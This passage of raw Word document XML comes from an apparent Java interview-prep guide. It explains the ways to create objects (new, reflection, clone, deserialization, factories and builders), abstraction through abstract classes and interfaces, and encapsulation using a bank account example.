    <w:p w14:paraId="171D0A15"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501882F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655EE6"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6F6929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C62A06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ot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0EB1027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t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p>
    <w:p w14:paraId="37B932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56C6CE1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DD888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04CC39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A56C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C9FEB8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1C89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D657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34EA31F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C885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yClass{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819FDF" w14:textId="661E35CB"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FA2B264" w14:textId="6B6D792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77E82D2">
          <v:rect id="_x0000_i1300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404D65C"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0" w:name="_Toc197867324"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many ways can we create objects of class in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="42D2B0EB" w14:textId="5F53583F" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 main ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C9E66"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new keyword (most common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5999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new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F128E2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FD81F">
          <v:rect id="_x0000_i1302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E51709"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frameworks like Hibernate, JDBC drivers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B17059"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tter alternative in Java 9+:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E06A5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class.getDeclaredConstructor().newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D718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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8197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clone() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755952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create a copy of an existing object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948492B"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1 = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152BF075"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2 = (MyClass) obj1.clone(); // Requires `Cloneable` interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B4795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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EF6D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Using Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470447C"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is created by reading from a byte stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72003398"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in.readObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764C5CB"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004FF1E"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Factory Methods or Builders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC24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Factory.createMyClass(); // Factory pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4FA19" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248B65D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r using a builder pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE3A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builder().id(1).name("Test").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B9B9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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD646C"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4B95" w14:paraId="6F692EC9" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF25847"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7EEA" w:rsidRPr="00CE4B95" w14:paraId="0AB8A359" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3134D81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 way to create object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="6367FC96" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685F3F4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lass loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="64D7BE83" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2751F397"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plicate an object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="22563AA7" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B4895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ore from saved state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="7DAB6C62" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6114E83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tern-based creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3469E49D" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95"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07" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426D9A6" w14:textId="77777777" w:rsidR="002B025E" w:rsidRPr="00CE4B95" w:rsidRDefault="002B025E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc197867325"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Abstraction?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="70173077" w14:textId="0569F8E2" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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is one of the core </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OOP principles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">It means </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hiding internal implementation details</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and showing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only essential features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB4B6D"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E9E6D">
          <v:rect id="_x0000_i1308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A797AB9"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life Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165FB2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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drive a car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you just use the steering wheel, accelerator, and brakes —</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t need to know</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> how the engine works internally.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This is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hiding the complex system behind a simple interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060C907"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8688">
          <v:rect id="_x0000_i1309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D04C8"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Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D546F"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24"/>
      </w:tblGrid>
      <w:tr w:rsidR="0086711B" w:rsidRPr="00CE4B95" w14:paraId="1C1883B0" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551CEFD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29791F"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86711B" w:rsidRPr="00CE4B95" w14:paraId="14CAFA5C" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7380C03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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5AF0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 abstraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086711B" w:rsidRPr="00CE4B95" w14:paraId="5635EF1D" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F36A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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4B4F8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abstraction (from Java 8+, can have default/static methods too)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E2310E9"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5B518">
          <v:rect id="_x0000_i1310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="524CB1A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bstract Class Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6347586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431795B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 // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6E0E5" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207EAE7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6F8266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68E6447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4DC62AA"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C1F5C3" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFE2A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DA425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D326D9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62A1F4B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3614A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7C33465"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provides a common interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDC58E"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provides the actual implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950C1A3"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14192">
          <v:rect id="_x0000_i1311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A21570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nterface Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14154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98078E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA9CAB"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491DCA" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C08CE23"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08D8E305"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389E32E"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starting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCFD3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EA9526"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68A3CE"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8D59E7">
          <v:rect id="_x0000_i1312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260D6E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bstraction?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58201C53"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reduce complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB8AE6"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chieve loose coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C75DF"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hide implementation details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07829719"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focus on what an object does</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not how it does it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08837A4B" w14:textId="2864479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623042F">
          <v:rect id="_x0000_i1313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA6FF9"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2" w:name="_Toc197867326"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Encapsulation? Explain with a real time example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="30A695F3" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">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Encapsulation is one of the fundamental OOPs principles in Java. It refers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapping data (variables) and the code (methods) that operates on the data into a single unit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — typically a class. It helps protect the internal state of an object from unwanted external modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D353BD" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Encapsulation is achieved using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23401F93"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rivate fields to restrict direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0820CB"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ublic getters and setters to allow controlled access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF0D26" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: Bank Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300838F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DD3C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field — can't be accessed directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432BC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759B3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F7ED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p>
    <w:p w14:paraId="5641E85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7BB46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C519AD"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get balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976F3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68D7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p>
    <w:p w14:paraId="481F834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CA684"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8D00B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deposit money (with validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61B34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posi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70D6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3ABA48"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1209320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D0F02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A48E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EAE6D6"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withdraw money (with validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6665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ithdraw</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5C0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C7B5F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789C7F6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D04E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60C52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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA88658" w14:textId="77777777" w:rsidR="00822151" w:rsidRPr="00CE4B95" w:rsidRDefault="00822151" w:rsidP="00822151">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B77CFD8" w14:textId="7AA8FAC0" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:p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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D5C2B"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The balance variable is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it's private.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4475E17F"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cess is provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only through public methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (getBalance, deposit, withdraw), ensuring that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795892FC"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The balance can't be set to a negative value directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BC32F"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Deposits and withdrawals go through validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC78D9" w14:textId="455AE3E8" w:rsidR="00B729A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00822151">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This prevents incorrect or unauthorized changes to the data, which is the essence of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xml:space="preserve"> in real-world applications.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6AED9799">
          <v:rect id="_x0000_i1314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D45C9" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
